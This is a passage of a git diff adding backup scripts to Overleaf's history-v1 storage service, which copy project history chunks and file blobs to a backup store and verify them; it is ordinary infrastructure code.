'not found': { + match: 'NotFoundError', + flag: FIX_NOT_FOUND, + action: fixNotFound, + }, + 'hash mismatch': { + match: 'OError: hash mismatch', + flag: FIX_HASH_MISMATCH, + action: fixHashMismatch, + }, + 'delete permission': { + match: 'storage.objects.delete', + flag: FIX_DELETE_PERMISSION, + action: fixDeletePermission, + }, + 'missing file hash': { + match: '"bad file hash"', + flag: FIX_MISSING_HASH, + action: fixMissingHash, + }, +} + +const STATS = { + processedLines: 0, + success: 0, + alreadyProcessed: 0, + fileDeleted: 0, + skipped: 0, + failed: 0, + unmatched: 0, +} +function logStats() { + console.log( + JSON.stringify({ + time: new Date(), + gracefulShutdownInitiated, + ...STATS, + }) + ) +} +setInterval(logStats, 10_000) + +async function processLog() { + const rl = readline.createInterface({ + input: fs.createReadStream(LOGS), + }) + nextLine: for await (const line of rl) { + if (gracefulShutdownInitiated) break + STATS.processedLines++ + if ( + !( + line.includes('"failed to process file"') || + // Process missing hashes as flagged by find_malformed_filetrees.mjs + line.includes('"bad file-tree path"') + ) + ) { + continue + } + + for (const [name, { match, flag, action }] of Object.entries(CASES)) { + if (!line.includes(match)) continue + if (flag) { + try { + if (await action(line)) { + STATS.success++ + } else { + STATS.alreadyProcessed++ + } + } catch (err) { + if (err instanceof FileDeletedError) { + STATS.fileDeleted++ + logger.info({ err, line }, 'file deleted, skipping') + } else { + STATS.failed++ + logger.error({ err, line }, `failed to fix ${name}`) + } + } + } else { + STATS.skipped++ + } + continue nextLine + } + STATS.unmatched++ + logger.warn({ line }, 'unknown fatal error') + } +} + +async function main() { + try { + await processLog() + } finally { + logStats() + try { + await fs.promises.rm(BUFFER_DIR, { recursive: true, force: true }) + } catch (err) { + console.error(`Cleanup of BUFFER_DIR=${BUFFER_DIR} failed`, err) + } + } + const { skipped, failed, unmatched } = STATS + await setTimeout(SLEEP_BEFORE_EXIT) + if (failed > 0) { + process.exit(Math.min(failed, 99)) + } else if (unmatched > 0) { + process.exit(100) + } else if (skipped > 0) { + process.exit(101) + } else { + process.exit(0) + } +} + +await main() diff --git a/services/history-v1/storage/scripts/backup.mjs b/services/history-v1/storage/scripts/backup.mjs new file mode 100644 index 0000000..9ae6101 --- /dev/null +++ b/services/history-v1/storage/scripts/backup.mjs @@ -0,0 +1,1104 @@ +// @ts-check + +import logger from '@overleaf/logger' +import commandLineArgs from 'command-line-args' +import { Chunk, History, Snapshot } from 'overleaf-editor-core' +import { + getProjectChunks, + loadLatestRaw, + create, +} from '../lib/chunk_store/index.js' +import { client } from '../lib/mongodb.js' +import redis from '../lib/redis.js' +import knex from '../lib/knex.js' +import { historyStore } from '../lib/history_store.js' +import pLimit from 'p-limit' +import { + GLOBAL_BLOBS, + loadGlobalBlobs, + makeProjectKey, + BlobStore, +} from '../lib/blob_store/index.js' +import { + listPendingBackups, + getBackupStatus, + setBackupVersion, + updateCurrentMetadataIfNotSet, + updatePendingChangeTimestamp, + getBackedUpBlobHashes, + unsetBackedUpBlobHashes, +} from '../lib/backup_store/index.js' +import { backupBlob, downloadBlobToDir } from '../lib/backupBlob.mjs' +import { + backupPersistor, + chunksBucket, + projectBlobsBucket, +} from '../lib/backupPersistor.mjs' +import { backupGenerator } from '../lib/backupGenerator.mjs' +import { promises as fs, createWriteStream } from 'node:fs' +import os from 'node:os' +import path from 'node:path' +import projectKey from '../lib/project_key.js' +import Crypto from 'node:crypto' +import Stream from 'node:stream' +import { EventEmitter } from 'node:events' +import { + objectIdFromInput, + batchedUpdate, + READ_PREFERENCE_SECONDARY, +} from '@overleaf/mongo-utils/batchedUpdate.js' +import { createGunzip } from 'node:zlib' +import { text } from 'node:stream/consumers' +import { fromStream as blobHashFromStream } from '../lib/blob_hash.js' +import { NotFoundError } from '@overleaf/object-persistor/src/Errors.js' + +// Create a singleton promise that loads global blobs once +let globalBlobsPromise = null +function ensureGlobalBlobsLoaded() { + if (!globalBlobsPromise) { + globalBlobsPromise = loadGlobalBlobs() + } + return globalBlobsPromise +} + +EventEmitter.defaultMaxListeners = 20 + +logger.initialize('history-v1-backup') + +// Settings shared between command-line and module usage +let DRY_RUN = false +let RETRY_LIMIT = 3 +const RETRY_DELAY = 1000 +let CONCURRENCY = 4 +let BATCH_CONCURRENCY = 1 +let BLOB_LIMITER = pLimit(CONCURRENCY) +let USE_SECONDARY = false + +/** + * Configure backup settings + * @param {Object} options Backup configuration options + */ +export function configureBackup(options = {}) { + DRY_RUN = options.dryRun || false + RETRY_LIMIT = options.retries || 3 + CONCURRENCY = options.concurrency || 1 + BATCH_CONCURRENCY = options.batchConcurrency || 1 + BLOB_LIMITER = pLimit(CONCURRENCY) + USE_SECONDARY = options.useSecondary || false +} + +let gracefulShutdownInitiated = false + +process.on('SIGINT', handleSignal) +process.on('SIGTERM', handleSignal) + +function handleSignal() { + gracefulShutdownInitiated = true + logger.info({}, 'graceful shutdown initiated, draining queue') +} + +async function retry(fn, times, delayMs) { + let attempts = times + while (attempts > 0) { + try { + const result = await fn() + return result + } catch (err) { + attempts-- + if (attempts === 0) throw err + await new Promise(resolve => setTimeout(resolve, delayMs)) + } + } +} + +function wrapWithRetry(fn, retries, delayMs) { + return async (...args) => { + const result = await retry(() => fn(...args), retries, delayMs) + return result + } +} + +const downloadWithRetry = wrapWithRetry( + downloadBlobToDir, + RETRY_LIMIT, + RETRY_DELAY +) +// FIXME: this creates a new backupPersistor for each blob +// so there is no caching of the DEK +const backupWithRetry = wrapWithRetry(backupBlob, RETRY_LIMIT, RETRY_DELAY) + +async function findNewBlobs(projectId, blobs) { + const newBlobs = [] + const existingBackedUpBlobHashes = await getBackedUpBlobHashes(projectId) + for (const blob of blobs) { + const hash = blob.getHash() + if (existingBackedUpBlobHashes.has(blob.getHash())) { + logger.debug({ projectId, hash }, 'Blob is already backed up, skipping') + continue + } + const globalBlob = GLOBAL_BLOBS.get(hash) + if (globalBlob && !globalBlob.demoted) { + logger.debug( + { projectId, hash }, + 'Blob is a global blob and not demoted, skipping' + ) + continue + } + newBlobs.push(blob) + } + return newBlobs +} + +async function cleanBackedUpBlobs(projectId, blobs) { + const hashes = blobs.map(blob => blob.getHash()) + if (DRY_RUN) { + console.log( + 'Would remove blobs', + hashes.join(' '), + 'from project', + projectId + ) + return + } + await unsetBackedUpBlobHashes(projectId, hashes) +} + +async function backupSingleBlob(projectId, historyId, blob, tmpDir, persistor) { + if (DRY_RUN) { + console.log( + 'Would back up blob', + JSON.stringify(blob), + 'in history', + historyId, + 'for project', + projectId + ) + return + } + logger.debug({ blob, historyId }, 'backing up blob') + const blobPath = await downloadWithRetry(historyId, blob, tmpDir) + await backupWithRetry(historyId, blob, blobPath, persistor) +} + +async function backupBlobs(projectId, historyId, blobs, limiter, persistor) { + let tmpDir + try { + tmpDir = await fs.mkdtemp(path.join(os.tmpdir(), 'blob-backup-')) + + const blobBackupOperations = blobs.map(blob => + limiter(backupSingleBlob, projectId, historyId, blob, tmpDir, persistor) + ) + + // Reject if any blob backup fails + await Promise.all(blobBackupOperations) + } finally { + if (tmpDir) { + await fs.rm(tmpDir, { recursive: true, force: true }) + } + } +} + +async function backupChunk( + projectId, + historyId, + chunkBackupPersistorForProject, + chunkToBackup, + chunkRecord, + chunkBuffer +) { + if (DRY_RUN) { + console.log( + 'Would back up chunk', + JSON.stringify(chunkRecord), + 'in history', + historyId, + 'for project', + projectId, + 'key', + makeChunkKey(historyId, chunkToBackup.startVersion) + ) + return + } + const key = makeChunkKey(historyId, chunkToBackup.startVersion) + logger.debug({ chunkRecord, historyId, projectId, key }, 'backing up chunk') + const md5 = Crypto.createHash('md5').update(chunkBuffer) + await chunkBackupPersistorForProject.sendStream( + chunksBucket, + makeChunkKey(historyId, chunkToBackup.startVersion), + Stream.Readable.from([chunkBuffer]), + { + contentType: 'application/json', + contentEncoding: 'gzip', + contentLength: chunkBuffer.byteLength, + sourceMd5: md5.digest('hex'), + } + ) +} + +async function updateBackupStatus( + projectId, + lastBackedUpVersion, + chunkRecord, + startOfBackupTime +) { + if (DRY_RUN) { + console.log( + 'Would set backup version to', + chunkRecord.endVersion, + 'with lastBackedUpTimestamp', + startOfBackupTime + ) + return + } + logger.debug( + { projectId, chunkRecord, startOfBackupTime }, + 'setting backupVersion and lastBackedUpTimestamp' + ) + await setBackupVersion( + projectId, + lastBackedUpVersion, + chunkRecord.endVersion, + startOfBackupTime + ) +} + +// Define command-line options +const optionDefinitions = [ + { + name: 'projectId', + alias: 'p', + type: String, + description: 'The ID of the project to backup', + defaultOption: true, + }, + { + name: 'help', + alias: 'h', + type: Boolean, + description: 'Display this usage guide.', + }, + { + name: 'status', + alias: 's', + type: Boolean, + description: 'Display project status.', + }, + { + name: 'list', + alias: 'l', + type: Boolean, + description: 'List projects that need to be backed up', + }, + { + name: 'dry-run', + alias: 'n', + type: Boolean, + description: 'Perform a dry run without making any changes.', + }, + { + name: 'retries', + alias: 'r', + type: Number, + description: 'Number of retries, default is 3.', + }, + { + name: 'concurrency', + alias: 'c', + type: Number, + description: 'Number of concurrent blob downloads (default: 1)', + }, + { + name: 'batch-concurrency', + alias: 'b', + type: Number, + description: 'Number of concurrent project operations (default: 1)', + }, + { + name: 'pending', + alias: 'P', + type: Boolean, + description: 'Backup all pending projects.', + }, + { + name: 'interval', + alias: 'i', + type: Number, + description: 'Time interval in seconds for pending backups (default: 3600)', + defaultValue: 3600, + }, + { + name: 'fix', + type: Number, + description: 'Fix projects without chunks', + }, + { + name: 'init', + alias: 'I', + type: Boolean, + description: 'Initialize backups for all projects.', + }, + { name: 'output', alias: 'o', type: String, description: 'Output file' }, + { + name: 'start-date', + type: String, + description: 'Start date for initialization (ISO format)', + }, + { + name: 'end-date', + type: String, + description: 'End date for initialization (ISO format)', + }, + { + name: 'use-secondary', + type: Boolean, + description: 'Use secondary read preference for backup status', + }, + { + name: 'compare', + alias: 'C', + type: Boolean, + description: + 'Compare backup with original chunks. With --start-date and --end-date compares all projects in range.', + }, +] + +function handleOptions() { + const options = commandLineArgs(optionDefinitions) + + if (options.help) { + console.log('Usage:') + optionDefinitions.forEach(option => { + console.log(` --${option.name}, -${option.alias}: ${option.description}`) + }) + process.exit(0) + } + + const projectIdRequired = + !options.list && + !options.pending && + !options.init && + !(options.fix >= 0) && + !(options.compare && options['start-date'] && options['end-date']) + + if (projectIdRequired && !options.projectId) { + console.error('Error: projectId is required') + process.exit(1) + } + + if (options.pending && options.projectId) { + console.error('Error: --pending cannot be specified with projectId') + process.exit(1) + } + + if (options.pending && (options.list || options.status)) { + console.error('Error: --pending is exclusive with --list and --status') + process.exit(1) + } + + if (options.init && options.pending) { + console.error('Error: --init cannot be specified with --pending') + process.exit(1) + } + + if ( + (options['start-date'] || options['end-date']) && + !options.init && + !options.compare + ) { + console.error( + 'Error: date options can only be used with --init or --compare' + ) + process.exit(1) + } + + if (options['use-secondary']) { + USE_SECONDARY = true + } + + if ( + options.compare && + !options.projectId && + !(options['start-date'] && options['end-date']) + ) { + console.error( + 'Error: --compare requires either projectId or both --start-date and --end-date' + ) + process.exit(1) + } + + DRY_RUN = options['dry-run'] || false + RETRY_LIMIT = options.retries || 3 + CONCURRENCY = options.concurrency || 1 + BATCH_CONCURRENCY = options['batch-concurrency'] || 1 + BLOB_LIMITER = pLimit(CONCURRENCY) + return options +} + +async function displayBackupStatus(projectId) { + const result = await analyseBackupStatus(projectId) + console.log('Backup status:', JSON.stringify(result)) +} + +async function analyseBackupStatus(projectId) { + const { backupStatus, historyId, currentEndVersion, currentEndTimestamp } = + await getBackupStatus(projectId) + // TODO: when we have confidence that the latestChunkMetadata always matches + // the values from the backupStatus we can skip loading it here + const latestChunkMetadata = await loadLatestRaw(historyId, { + readOnly: Boolean(USE_SECONDARY), + }) + if ( + currentEndVersion && + currentEndVersion !== latestChunkMetadata.endVersion + ) { + // compare the current end version with the latest chunk metadata to check that + // the updates to the project collection are reliable + // expect some failures due to the time window between getBackupStatus and + // loadLatestRaw where the project is being actively edited. + logger.warn( + { + projectId, + historyId, + currentEndVersion, + currentEndTimestamp, + latestChunkMetadata, + }, + 'currentEndVersion does not match latest chunk metadata' + ) + } + + if (DRY_RUN) { + console.log('Project:', projectId) + console.log('History ID:', historyId) + console.log('Latest Chunk Metadata:', JSON.stringify(latestChunkMetadata)) + console.log('Current end version:', currentEndVersion) + console.log('Current end timestamp:', currentEndTimestamp) + console.log('Backup status:', backupStatus ?? 'none') + } + if (!backupStatus) { + if (DRY_RUN) { + console.log('No backup status found - doing full backup') + } + } + const lastBackedUpVersion = backupStatus?.lastBackedUpVersion + const endVersion = latestChunkMetadata.endVersion + if (endVersion >= 0 && endVersion === lastBackedUpVersion) { + if (DRY_RUN) { + console.log( + 'Project is up to date, last backed up at version', + lastBackedUpVersion + ) + } + } else if (endVersion < lastBackedUpVersion) { + throw new Error('backup is ahead of project') + } else { + if (DRY_RUN) { + console.log( + 'Project needs to be backed up from', + lastBackedUpVersion, + 'to', + endVersion + ) + } + } + + return { + historyId, + lastBackedUpVersion, + currentVersion: latestChunkMetadata.endVersion || 0, + upToDate: endVersion >= 0 && lastBackedUpVersion === endVersion, + pendingChangeAt: backupStatus?.pendingChangeAt, + currentEndVersion, + currentEndTimestamp, + latestChunkMetadata, + } +} + +async function displayPendingBackups(options) { + const intervalMs = options.interval * 1000 + for await (const project of listPendingBackups(intervalMs)) { + console.log( + 'Project:', + project._id.toHexString(), + 'backup status:', + JSON.stringify(project.overleaf.backup), + 'history status:', + JSON.stringify(project.overleaf.history, [ + 'currentEndVersion', + 'currentEndTimestamp', + ]) + ) + } +} + +function makeChunkKey(projectId, startVersion) { + return path.join(projectKey.format(projectId), projectKey.pad(startVersion)) +} + +export async function backupProject(projectId, options) { + if (gracefulShutdownInitiated) { + return + } + await ensureGlobalBlobsLoaded() + // FIXME: flush the project first! + // Let's assume the the flush happens externally and triggers this backup + const backupStartTime = new Date() + // find the last backed up version + const { + historyId, + lastBackedUpVersion, + currentVersion, + upToDate, + pendingChangeAt, + currentEndVersion, + latestChunkMetadata, + } = await analyseBackupStatus(projectId) + + if (upToDate) { + logger.debug( + { + projectId, + historyId, + lastBackedUpVersion, + currentVersion, + pendingChangeAt, + }, + 'backup is up to date' + ) + + if ( + currentEndVersion === undefined && + latestChunkMetadata.endVersion >= 0 + ) { + if (DRY_RUN) { + console.log('Would update current metadata to', latestChunkMetadata) + } else { + await updateCurrentMetadataIfNotSet(projectId, latestChunkMetadata) + } + } + + // clear the pending changes timestamp if the backup is complete + if (pendingChangeAt) { + if (DRY_RUN) { + console.log( + 'Would update or clear pending changes timestamp', + backupStartTime + ) + } else { + await updatePendingChangeTimestamp(projectId, backupStartTime) + } + } + return + } + + logger.debug( + { + projectId, + historyId, + lastBackedUpVersion, + currentVersion, + pendingChangeAt, + }, + 'backing up project' + ) + + // this persistor works for both the chunks and blobs buckets, + // because they use the same DEK + const backupPersistorForProject = await backupPersistor.forProject( + chunksBucket, + makeProjectKey(historyId, '') + ) + + let previousBackedUpVersion = lastBackedUpVersion + const backupVersions = [previousBackedUpVersion] + + for await (const { + blobsToBackup, + chunkToBackup, + chunkRecord, + chunkBuffer, + } of backupGenerator(historyId, lastBackedUpVersion)) { + // backup the blobs first + // this can be done in parallel but must fail if any blob cannot be backed up + // if the blob already exists in the backup then that is allowed + const newBlobs = await findNewBlobs(projectId, blobsToBackup) + + await backupBlobs( + projectId, + historyId, + newBlobs, + BLOB_LIMITER, + backupPersistorForProject + ) + + // then backup the original compressed chunk using the startVersion as the key + await backupChunk( + projectId, + historyId, + backupPersistorForProject, + chunkToBackup, + chunkRecord, + chunkBuffer + ) + + // persist the backup status in mongo for the current chunk + try { + await updateBackupStatus( + projectId, + previousBackedUpVersion, + chunkRecord, + backupStartTime + ) + } catch (err) { + logger.error( + { projectId, chunkRecord, err, backupVersions }, + 'error updating backup status' + ) + throw err + } + + previousBackedUpVersion = chunkRecord.endVersion + backupVersions.push(previousBackedUpVersion) + + await cleanBackedUpBlobs(projectId, blobsToBackup) + } + + // update the current end version and timestamp if they are not set + if (currentEndVersion === undefined && latestChunkMetadata.endVersion >= 0) { + if (DRY_RUN) { + console.log('Would update current metadata to', latestChunkMetadata) + } else { + await updateCurrentMetadataIfNotSet(projectId, latestChunkMetadata) + } + } + + // clear the pending changes timestamp if the backup is complete, otherwise set it to the time + // when the backup started (to pick up the new changes on the next backup) + if (DRY_RUN) { + console.log( + 'Would update or clear pending changes timestamp', + backupStartTime + ) + } else { + await updatePendingChangeTimestamp(projectId, backupStartTime) + } +} + +function convertToISODate(dateStr) { + // Expecting YYYY-MM-DD format + if (!/^\d{4}-\d{2}-\d{2}$/.test(dateStr)) { + throw new Error('Date must be in YYYY-MM-DD format') + } + return new Date(dateStr + 'T00:00:00.000Z').toISOString() +} + +export async function fixProjectsWithoutChunks(options) { + const limit = options.fix || 1 + const query = { + 'overleaf.history.id': { $exists: true }, + 'overleaf.backup.lastBackedUpVersion': { $in: [null] }, + } + const cursor = client + .db() + .collection('projects') + .find(query, { + projection: { _id: 1, 'overleaf.history.id': 1 }, + readPreference: READ_PREFERENCE_SECONDARY, + }) + .limit(limit) + for await (const project of cursor) { + const historyId = project.overleaf.history.id.toString() + const chunks = await getProjectChunks(historyId) + if (chunks.length > 0) { + continue + } + if (DRY_RUN) { + console.log( + 'Would create new chunk for Project ID:', + project._id.toHexString(), + 'History ID:', + historyId, + 'Chunks:', + chunks + ) + } else { + console.log( + 'Creating new chunk for Project ID:', + project._id.toHexString(), + 'History ID:', + historyId, + 'Chunks:', + chunks + ) + const snapshot = new Snapshot() + const history = new History(snapshot, []) + const chunk = new Chunk(history, 0) + await create(historyId, chunk) + const newChunks = await getProjectChunks(historyId) + console.log('New chunk:', newChunks) + } + } +} + +export async function initializeProjects(options) { + await ensureGlobalBlobsLoaded() + let totalErrors = 0 + let totalProjects = 0 + + const query = { + 'overleaf.backup.lastBackedUpVersion': { $in: [null] }, + } + + if (options['start-date'] && options['end-date']) { + query._id = { + $gte: objectIdFromInput(convertToISODate(options['start-date'])), + $lt: objectIdFromInput(convertToISODate(options['end-date'])), + } + } + + const cursor = client + .db() + .collection('projects') + .find(query, { + projection: { _id: 1 }, + readPreference: READ_PREFERENCE_SECONDARY, + }) + + if (options.output) { + console.log("Writing project IDs to file: '" + options.output + "'") + const output = createWriteStream(options.output) + for await (const project of cursor) { + output.write(project._id.toHexString() + '\n') + totalProjects++ + } + output.end() + console.log('Wrote ' + totalProjects + ' project IDs to file') + return + } + + for await (const project of cursor) { + if (gracefulShutdownInitiated) { + console.warn('graceful shutdown: stopping project initialization') + break + } + totalProjects++ + const projectId = project._id.toHexString() + try { + await backupProject(projectId, options) + } catch (err) { + totalErrors++ + logger.error({ projectId, err }, 'error backing up project') + } + } + + return { errors: totalErrors, projects: totalProjects } +} + +async function backupPendingProjects(options) { + const intervalMs = options.interval * 1000 + for await (const project of listPendingBackups(intervalMs)) { + if (gracefulShutdownInitiated) { + console.warn('graceful shutdown: stopping pending project backups') + break + } + const projectId = project._id.toHexString() + console.log(`Backing up pending project with ID: ${projectId}`) + await backupProject(projectId, options) + } +} + +class BlobComparator { + constructor(backupPersistorForProject) { + this.cache = new Map() + this.backupPersistorForProject = backupPersistorForProject + } + + async compareBlob(historyId, blob) { + let computedHash = this.cache.get(blob.hash) + const fromCache = !!computedHash + + if (!computedHash) { + const blobKey = makeProjectKey(historyId, blob.hash) + const backupBlobStream = + await this.backupPersistorForProject.getObjectStream( + projectBlobsBucket, + blobKey, + { autoGunzip: true } + ) + computedHash = await blobHashFromStream(blob.byteLength, backupBlobStream) + this.cache.set(blob.hash, computedHash) + } + + const matches = computedHash === blob.hash + return { + matches, + computedHash, + fromCache, + } + } +} + +async function compareBackups(projectId, options) { + console.log(`Comparing backups for project ${projectId}`) + const { historyId } = await getBackupStatus(projectId) + const chunks = await getProjectChunks(historyId) + const blobStore = new BlobStore(historyId) + const backupPersistorForProject = await backupPersistor.forProject( + chunksBucket, + makeProjectKey(historyId, '') + ) + + let totalChunkMatches = 0 + let totalChunkMismatches = 0 + let totalChunksNotFound = 0 + let totalBlobMatches = 0 + let totalBlobMismatches = 0 + let totalBlobsNotFound = 0 + const errors = [] + const blobComparator = new BlobComparator(backupPersistorForProject) + + for (const chunk of chunks) { + try { + // Compare chunk content + const originalChunk = await historyStore.loadRaw(historyId, chunk.id) + const key = makeChunkKey(historyId, chunk.startVersion) + try { + const backupChunkStream = + await backupPersistorForProject.getObjectStream(chunksBucket, key) + const backupStr = await text(backupChunkStream.pipe(createGunzip())) + const originalStr = JSON.stringify(originalChunk) + const backupChunk = JSON.parse(backupStr) + const backupStartVersion = chunk.startVersion + const backupEndVersion = chunk.startVersion + backupChunk.changes.length + + if (originalStr === backupStr) { + console.log( + `✓ Chunk ${chunk.id} (v${chunk.startVersion}-v${chunk.endVersion}) matches` + ) + totalChunkMatches++ + } else if (originalStr === JSON.stringify(JSON.parse(backupStr))) { + console.log( + `✓ Chunk ${chunk.id} (v${chunk.startVersion}-v${chunk.endVersion}) matches (after normalisation)` + ) + totalChunkMatches++ + } else if (backupEndVersion < chunk.endVersion) { + console.log( + `✗ Chunk ${chunk.id} is ahead of backup (v${chunk.startVersion}-v${chunk.endVersion} vs v${backupStartVersion}-v${backupEndVersion})` + ) + totalChunkMismatches++ + errors.push({ chunkId: chunk.id, error: 'Chunk ahead of backup' }) + } else { + console.log( + `✗ Chunk ${chunk.id} (v${chunk.startVersion}-v${chunk.endVersion}) MISMATCH` + ) + totalChunkMismatches++ + errors.push({ chunkId: chunk.id, error: 'Chunk mismatch' }) + } + } catch (err) { + if (err instanceof NotFoundError) { + console.log(`✗ Chunk ${chunk.id} not found in backup`, err.cause) + totalChunksNotFound++ + errors.push({ chunkId: chunk.id, error: `Chunk not found` }) + } else { + throw err + } + } + + const history = History.fromRaw(originalChunk) + + // Compare blobs in chunk + const blobHashes = new Set() + history.findBlobHashes(blobHashes) + const blobs = await blobStore.getBlobs(Array.from(blobHashes)) + for (const blob of blobs) { + if (GLOBAL_BLOBS.has(blob.hash)) { + const globalBlob = GLOBAL_BLOBS.get(blob.hash) + console.log( + ` ✓ Blob ${blob.hash} is a global blob`, + globalBlob.demoted ? '(demoted)' : '' + ) + continue + } + try { + const { matches, computedHash, fromCache } = + await blobComparator.compareBlob(historyId, blob) + + if (matches) { + console.log( + ` ✓ Blob ${blob.hash} hash matches (${blob.byteLength} bytes)` + + (fromCache ? ' (from cache)' : '') + ) + totalBlobMatches++ + } else { + console.log( + ` ✗ Blob ${blob.hash} hash mismatch (original: ${blob.hash}, backup: ${computedHash}) (${blob.byteLength} bytes, ${blob.stringLength} string length)` + + (fromCache ? ' (from cache)' : '') + ) + totalBlobMismatches++ + errors.push({ + chunkId: chunk.id, + error: `Blob ${blob.hash} hash mismatch`, + }) + } + } catch (err) { + if (err instanceof NotFoundError) { + console.log(` ✗ Blob ${blob.hash} not found in backup`, err.cause) + totalBlobsNotFound++ + errors.push({ + chunkId: chunk.id, + error: `Blob ${blob.hash} not found`, + }) + } else { + throw err + } + } + } + } catch (err) { + console.error(`Error comparing chunk ${chunk.id}:`, err) + errors.push({ chunkId: chunk.id, error: err }) + } + } + + // Print summary + console.log('\nComparison Summary:') + console.log('==================') + console.log(`Total chunks: ${chunks.length}`) + console.log(`Chunk matches: ${totalChunkMatches}`) + console.log(`Chunk mismatches: ${totalChunkMismatches}`) + console.log(`Chunk not found: ${totalChunksNotFound}`) + console.log(`Blob matches: ${totalBlobMatches}`) + console.log(`Blob mismatches: ${totalBlobMismatches}`) + console.log(`Blob not found: ${totalBlobsNotFound}`) + console.log(`Errors: ${errors.length}`) + + if (errors.length > 0) { + console.log('\nErrors:') + errors.forEach(({ chunkId, error }) => { + console.log(` Chunk ${chunkId}: ${error}`) + }) + throw new Error('Backup comparison FAILED') + } else { + console.log('Backup comparison successful') + } +} + +async function compareAllProjects(options) { + const limiter = pLimit(BATCH_CONCURRENCY) + let totalErrors = 0 + let totalProjects = 0 + + async function processBatch(batch) { + if (gracefulShutdownInitiated) { + throw new Error('graceful shutdown') + } + const batchOperations = batch.map(project => + limiter(async () => { + const projectId = project._id.toHexString() + totalProjects++ + try { + console.log(`\nComparing project ${projectId} (${totalProjects})`) + await compareBackups(projectId, options) + } catch (err) { + totalErrors++ + console.error(`Failed to compare project ${projectId}:`, err) + } + }) + ) + await Promise.allSettled(batchOperations) + } + + const query = { + 'overleaf.history.id': { $exists: true }, + 'overleaf.backup.lastBackedUpVersion': { $exists: true }, + } + + await batchedUpdate( + client.db().collection('projects'), + query, + processBatch, + { + _id: 1, + 'overleaf.history': 1, + 'overleaf.backup': 1, + }, + { readPreference: 'secondary' }, + { + BATCH_RANGE_START: convertToISODate(options['start-date']), + BATCH_RANGE_END: convertToISODate(options['end-date']), + } + ) + + console.log('\nComparison Summary:') + console.log('==================') + console.log(`Total projects processed: ${totalProjects}`) + console.log(`Projects with errors: ${totalErrors}`) + + if (totalErrors > 0) { + throw new Error('Some project comparisons failed') + } +} + +async function main() { + const options = handleOptions() + await ensureGlobalBlobsLoaded() + const projectId = options.projectId + if (options.status) { + await displayBackupStatus(projectId) + } else if (options.list) { + await displayPendingBackups(options) + } else if (options.fix !== undefined) { + await fixProjectsWithoutChunks(options) + } else if (options.pending) { + await backupPendingProjects(options) + } else if (options.init) { + await initializeProjects(options) + } else if (options.compare) { + if (options['start-date'] && options['end-date']) { + await compareAllProjects(options) + } else { + await compareBackups(projectId, options) + } + } else { + await backupProject(projectId, options) + } +} + +// Only run command-line interface when script is run directly +if (import.meta.url === `file://${process.argv[1]}`) { + main() + .then(() => { + console.log( + gracefulShutdownInitiated ? 'Exited - graceful shutdown' : 'Completed' + ) + }) + .catch(err => { + console.error('Error backing up project:', err) + process.exit(1) + }) + .finally(() => { + knex + .destroy() + .then(() => { + console.log('Postgres connection closed') + }) + .catch(err => { + console.error('Error closing Postgres connection:', err) + }) + client + .close() + .then(() => { + console.log('MongoDB connection closed') + }) + .catch(err => { + console.error('Error closing MongoDB connection:', err) + }) + redis + .disconnect() + .then(() => { + console.log('Redis connection closed') + }) + .catch(err => { + console.error('Error closing Redis connection:', err) + }) + }) +} diff --git a/services/history-v1/storage/scripts/backup_blob.mjs b/services/history-v1/storage/scripts/backup_blob.mjs new file mode 100644 index 0000000..314b053 --- /dev/null +++ b/services/history-v1/storage/scripts/backup_blob.mjs @@ -0,0 +1,173 @@ +// @ts-check +import commandLineArgs from 'command-line-args' +import { backupBlob, downloadBlobToDir } from '../lib/backupBlob.mjs' +import withTmpDir from '../../api/controllers/with_tmp_dir.js' +import { + BlobStore, + GLOBAL_BLOBS, + loadGlobalBlobs, +} from '../lib/blob_store/index.js' +import assert from '../lib/assert.js' +import knex from '../lib/knex.js' +import { client } from '../lib/mongodb.js' +import redis from '../lib/redis.js' +import { setTimeout } from 'node:timers/promises' +import fs from 'node:fs' + +await loadGlobalBlobs() + +/** + * Gracefully shutdown the process + * @return {Promise<void>} + */ +async function gracefulShutdown() { + console.log('Gracefully shutting down') + await knex.destroy() + await client.close() + await redis.disconnect() + await setTimeout(100) + process.exit() +} + +/** + * + * @param {string} row + * @return {BackupBlobJob} + */ +function parseCSVRow(row) { + const [historyId, hash] = row.split(',') + validateBackedUpBlobJob({ historyId, hash }) + return { historyId, hash } +} + +/** + * + * @param {BackupBlobJob} job + */ +function validateBackedUpBlobJob(job) { + assert.projectId(job.historyId) + assert.blobHash(job.hash) +} + +/** + * + * @param {string} path + * @return {Promise<Array<BackupBlobJob>>} + */ +async function readCSV(path) { + let fh + /** @type {Array<BackupBlobJob>} */ + const rows = [] + try { + fh = await fs.promises.open(path, 'r') + } catch (error) { + console.error(`Could not open file: ${error}`) + throw error + } + for await (const line of fh.readLines()) { + try { + const row = parseCSVRow(line) + if (GLOBAL_BLOBS.has(row.hash)) { + console.log(`Skipping global blob: ${line}`) + continue + } + rows.push(row) + } catch (error) { + console.error(error instanceof Error ? error.message : error) + console.log(`Skipping invalid row: ${line}`) + } + } + return rows +} + +/** + * @typedef {Object} BackupBlobJob + * @property {string} hash + * @property {string} historyId + */ + +/** + * @param {Object} options + * @property {string} [options.historyId] + * @property {string} [options.hash] + * @property {string} [options.input] + * @return {Promise<Array<BackupBlobJob>>} + */ +async function initialiseJobs({ historyId, hash, input }) { + if (input) { + return await readCSV(input) + } + + if (!historyId) { + console.error('historyId is required') + process.exitCode = 1 + await gracefulShutdown() + } + + if (!hash) { + console.error('hash is required') + process.exitCode = 1 + await gracefulShutdown() + } + + validateBackedUpBlobJob({ historyId, hash }) + + if (GLOBAL_BLOBS.has(hash)) { + console.error(`Blob ${hash} is a global blob; not backing up`) + process.exitCode = 1 + await gracefulShutdown() + } + return [{ hash, historyId }] +} + +/** + * + * @param {string} historyId + * @param {string} hash + * @return {Promise<void>} + */ +export async function downloadAndBackupBlob(historyId, hash) { + const blobStore = new BlobStore(historyId) + const blob = await blobStore.getBlob(hash) + if (!blob) { + throw new Error(`Blob ${hash} could not be loaded`) + } + await withTmpDir(`blob-${hash}`, async tmpDir => { + const filePath = await downloadBlobToDir(historyId, blob, tmpDir) + console.log(`Downloaded blob ${hash} to ${filePath}`) + await backupBlob(historyId, blob, filePath) + console.log('Backed up blob') + }) +} + +let jobs + +const options = commandLineArgs([ + { name: 'historyId', type: String }, + { name: 'hash', type: String }, + { name: 'input', type: String }, +]) + +try { + jobs = await initialiseJobs(options) +} catch (error) { + console.error(error) + await gracefulShutdown() +} + +if (!Array.isArray(jobs)) { + // This is mostly to satisfy typescript + process.exitCode = 1 + await gracefulShutdown() + process.exit(1) +} + +for (const { historyId, hash } of jobs) { + try { + await downloadAndBackupBlob(historyId, hash) + } catch (error) { + console.error(error) + 